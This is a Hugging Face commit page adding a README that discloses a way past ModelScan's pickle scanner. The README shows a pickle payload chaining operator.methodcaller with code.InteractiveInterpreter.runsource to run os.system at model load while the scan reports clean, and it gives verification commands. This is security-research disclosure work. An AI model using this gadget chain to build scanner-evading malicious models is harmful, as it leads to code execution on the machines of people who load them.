Upload README.md with huggingface_hub
Browse files
README.md
ADDED
|
@@ -0,0 +1,61 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
library_name: mlflow
|
| 3 |
+
tags:
|
| 4 |
+
- security-research
|
| 5 |
+
- modelscan-bypass
|
| 6 |
+
- code
|
| 7 |
+
- InteractiveInterpreter
|
| 8 |
+
- methodcaller
|
| 9 |
+
- rce
|
| 10 |
+
---
|
| 11 |
+
|
| 12 |
+
# ModelScan code.InteractiveInterpreter Bypass — RCE via code.InteractiveInterpreter.runsource()
|
| 13 |
+
|
| 14 |
+
## Summary
|
| 15 |
+
|
| 16 |
+
ModelScan's pickle scanner uses an `unsafe_globals` denylist to detect malicious pickle operations. However, **`code.InteractiveInterpreter`** and **`operator.methodcaller`** are NOT in the denylist.
|
| 17 |
+
|
| 18 |
+
This MLflow model achieves arbitrary Python code execution through `code.InteractiveInterpreter.runsource()`, while ModelScan reports zero issues.
|
| 19 |
+
|
| 20 |
+
## Attack Chain
|
| 21 |
+
|
| 22 |
+
The pickle bytecode uses only two STACK_GLOBAL opcodes:
|
| 23 |
+
|
| 24 |
+
1. `operator.methodcaller('runsource', '__import__("os").system("cmd")')` → Creates a callable
|
| 25 |
+
2. `code.InteractiveInterpreter()` → Creates an interactive interpreter instance
|
| 26 |
+
|
| 27 |
+
At load time: `methodcaller(interpreter)` → `interpreter.runsource('__import__("os").system("cmd")')` → Arbitrary Python code execution
|
| 28 |
+
|
| 29 |
+
## Why It Works
|
| 30 |
+
|
| 31 |
+
- `code` module is entirely absent from unsafe_globals
|
| 32 |
+
- `operator.methodcaller` is not blocked (only `operator.attrgetter` is)
|
| 33 |
+
- Unlike `os.system` which only runs shell commands, `runsource()` executes arbitrary Python code
|
| 34 |
+
|
| 35 |
+
## Verification
|
| 36 |
+
|
| 37 |
+
```bash
|
| 38 |
+
# 1. ModelScan says CLEAN
|
| 39 |
+
modelscan -p model.pkl
|
| 40 |
+
# Output: No issues found! 🎉
|
| 41 |
+
|
| 42 |
+
# 2. MLflow load triggers RCE
|
| 43 |
+
python3 -c "
|
| 44 |
+
import mlflow.pyfunc
|
| 45 |
+
model = mlflow.pyfunc.load_model('.')
|
| 46 |
+
"
|
| 47 |
+
|
| 48 |
+
# 3. Direct pickle.load() triggers RCE
|
| 49 |
+
python3 -c "
|
| 50 |
+
import pickle
|
| 51 |
+
with open('model.pkl', 'rb') as f:
|
| 52 |
+
pickle.load(f)
|
| 53 |
+
"
|
| 54 |
+
```
|
| 55 |
+
|
| 56 |
+
## Impact
|
| 57 |
+
|
| 58 |
+
- **Severity**: Critical (CVSS 9.8)
|
| 59 |
+
- **Affected**: All pickle-based formats scanned by ModelScan
|
| 60 |
+
- Remote, no auth needed, no user interaction
|
| 61 |
+
- Executes arbitrary Python code (not limited to shell commands)
|